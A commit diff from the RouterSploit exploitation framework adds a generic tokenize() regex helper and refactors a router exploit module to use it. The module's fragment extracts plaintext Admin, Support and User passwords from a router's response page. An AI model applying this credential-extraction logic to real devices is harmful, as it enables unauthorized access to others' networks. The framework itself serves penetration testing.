Commit 107678b3 by fwkz

Adding tokenize()

parent 121eed79
...@@ -7,6 +7,7 @@ from routersploit.utils import ( ...@@ -7,6 +7,7 @@ from routersploit.utils import (
sanitize_url, sanitize_url,
LockedIterator, LockedIterator,
http_request, http_request,
tokenize,
) )
from routersploit import exploits from routersploit import exploits
......
import re
from routersploit import ( from routersploit import (
exploits, exploits,
sanitize_url, sanitize_url,
...@@ -7,6 +5,7 @@ from routersploit import ( ...@@ -7,6 +5,7 @@ from routersploit import (
print_error, print_error,
print_success, print_success,
print_table, print_table,
tokenize,
http_request, http_request,
) )
...@@ -44,17 +43,14 @@ class Exploit(exploits.Exploit): ...@@ -44,17 +43,14 @@ class Exploit(exploits.Exploit):
except AttributeError: except AttributeError:
return return
admin = re.findall("pwdAdmin = '(.+?)'", response) tokens = [
if admin: ("Admin", r"pwdAdmin = '(.+?)'"),
creds.append(('Admin', admin[0])) ("Support", r"pwdSupport = '(.+?)'"),
("User", r"pwdUser = '(.+?)'")
support = re.findall("pwdSupport = '(.+?)'", response) ]
if support:
creds.append(('Support', support[0]))
user = re.findall("pwdUser = '(.+?)'", response) for token in tokenize(tokens, response):
if user: creds.append((token.typ, token.value))
creds.append(('User', user[0]))
if creds: if creds:
print_success("Credentials found!") print_success("Credentials found!")
......
...@@ -2,6 +2,8 @@ from __future__ import print_function ...@@ -2,6 +2,8 @@ from __future__ import print_function
import threading import threading
from functools import wraps from functools import wraps
import sys import sys
import re
import collections
import requests import requests
...@@ -259,3 +261,27 @@ def http_request(method, url, **kwargs): ...@@ -259,3 +261,27 @@ def http_request(method, url, **kwargs):
except requests.RequestException as error: except requests.RequestException as error:
print_error(error) print_error(error)
return return
def tokenize(token_specification, text):
Token = collections.namedtuple('Token', ['typ', 'value', 'line', 'column', 'mo'])
token_specification.extend((
('NEWLINE', r'\n'), # Line endings
('SKIP', r'.'), # Any other character
))
tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification)
line_num = 1
line_start = 0
for mo in re.finditer(tok_regex, text):
kind = mo.lastgroup
value = mo.group(kind)
if kind == 'NEWLINE':
line_start = mo.end()
line_num += 1
elif kind == 'SKIP':
pass
else:
column = mo.start() - line_start
yield Token(kind, value, line_num, column, mo)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment